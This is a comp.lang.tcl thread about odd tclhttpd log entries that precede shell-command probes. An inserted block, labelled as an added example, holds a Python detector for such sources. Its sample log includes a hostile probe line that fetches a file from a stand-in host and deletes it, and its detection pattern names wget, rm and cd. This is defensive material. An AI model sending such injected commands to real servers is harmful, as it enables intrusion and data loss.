Subject: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Tue, 2 Jul 2024 19:10 UTC

I wonder if anyone is familiar with tclhttpd log entries and can shed
some light on this:

Typically each log entry contains a bunch of attributes including the ip
address, a timestamp, the requested url, user agent, http code, etc.
But I am seeing an increasing number of weird entries where most of that
info is empty. The lines only include the ip address and the timestamp,
and the rest is just "- - - - -".

What does this mean?

Subject: Re: tclhttpd logs
From: Colin Macleod
Newsgroups: comp.lang.tcl
Date: Wed, 3 Jul 2024 19:00 UTC
References: 1

saito <saitology9@gmail.com> posted:

> I wonder if anyone is familiar with tclhttpd log entries and can shed
> some light on this:
>
> Typically each log entry contains a bunch of attributes including the ip
> address, a timestamp, the requested url, user agent, http code, etc.
> But I am seeing an increasing number of weird entries where most of that
> info is empty. The lines only include the ip address and the timestamp,
> and the rest is just "- - - - -".
>
> What does this mean?

Yes I see this occasionally, got a single one yesterday, none today. I don't know what causes it though.

--
Colin Macleod.

Subject: Re: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Thu, 4 Jul 2024 01:27 UTC
References: 1 2 3 4

On 7/3/2024 3:00 PM, Colin Macleod wrote:
>
> Yes I see this occasionally, got a single one yesterday, none today. I don't know what causes it though.
>

Yeah, it doesn't look kosher. I saw like 10 of them like that one after
another. Then I get normal entries from the same source but the
requests all appear to be hacking attempts containing shell commands
with rm, cd, wget, or some .php stuff.
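
The pattern described in the post above (a run of entries carrying only an IP address and a timestamp, followed by probe requests from the same source) can be checked for mechanically. This is an added example, not part of the thread or of tclhttpd: the log layout is assumed to be Common Log Format-like, the sample lines are constructed, and `analyse` and `suspicious_sources` are hypothetical names.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (not from the thread). Assumed layout: ip, ident,
# user, [timestamp], then request/status/bytes/referer/agent; an "empty"
# entry has only "-" placeholders after the timestamp, as the post describes.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jul/2024:15:10:01 -0400] - - - - -
203.0.113.7 - - [02/Jul/2024:15:10:02 -0400] - - - - -
203.0.113.7 - - [02/Jul/2024:15:10:03 -0400] - - - - -
203.0.113.7 - - [02/Jul/2024:15:10:09 -0400] "GET /cgi-bin/x?cmd=cd+/tmp;wget+http://example.invalid/a;rm+-rf+a HTTP/1.1" 404 0 "-" "-"
203.0.113.7 - - [02/Jul/2024:15:10:11 -0400] "POST /admin/index.php HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.20 - - [02/Jul/2024:15:11:00 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.21 - - [02/Jul/2024:15:12:00 -0400] - - - - -
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?\[[^\]]+\]\s*(?P<rest>.*)$')
EMPTY_RE = re.compile(r'^(?:-\s*)+$')   # nothing but "-" placeholders
# Shell verbs named in the thread used as commands, or a .php target
# (a server that serves no PHP has no legitimate .php requests).
PROBE_RE = re.compile(r'(?:^|[\s;|&=`(])(?:wget|rm|cd)\s|\.php\b', re.I)

def analyse(log_text):
    """Count empty, probe and normal entries per source IP."""
    stats = defaultdict(lambda: {"empty": 0, "probes": 0, "normal": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not in the assumed layout
        rest = m.group("rest").strip()
        entry = stats[m.group("ip")]
        if EMPTY_RE.match(rest):
            entry["empty"] += 1
        elif PROBE_RE.search(unquote_plus(rest)):  # decode %xx and "+" first
            entry["probes"] += 1
        else:
            entry["normal"] += 1
    return dict(stats)

def suspicious_sources(stats, min_empty=3):
    """IPs that sent a run of empty entries and also probe requests."""
    return sorted(ip for ip, s in stats.items()
                  if s["empty"] >= min_empty and s["probes"] > 0)

if __name__ == "__main__":
    print(suspicious_sources(analyse(SAMPLE_LOG)))
```

A source with empty entries alone is counted but not flagged; adjust `LINE_RE` to the field order your own log actually uses.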

Subject: Re: tclhttpd logs
From: Colin Macleod
Newsgroups: comp.lang.tcl
Date: Thu, 4 Jul 2024 08:02 UTC
References: 1 2 3

saito <saitology9@gmail.com> posted:

>
> Yeah, it doesn't look kosher. I saw like 10 of them like that one after
> another. Then I get normal entries from the same source but the
> requests all appear to be hacking attempts containing shell commands
> with rm, cd, wget, or some .php stuff.

Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
http://paste.tclers.tk/5935

--
Colin Macleod.

Subject: Re: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Thu, 4 Jul 2024 13:53 UTC
References: 1 2 3 4

On 7/4/2024 4:02 AM, Colin Macleod wrote:
>
> Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
> http://paste.tclers.tk/5935
>

Nice! They definitely deserve it :-)
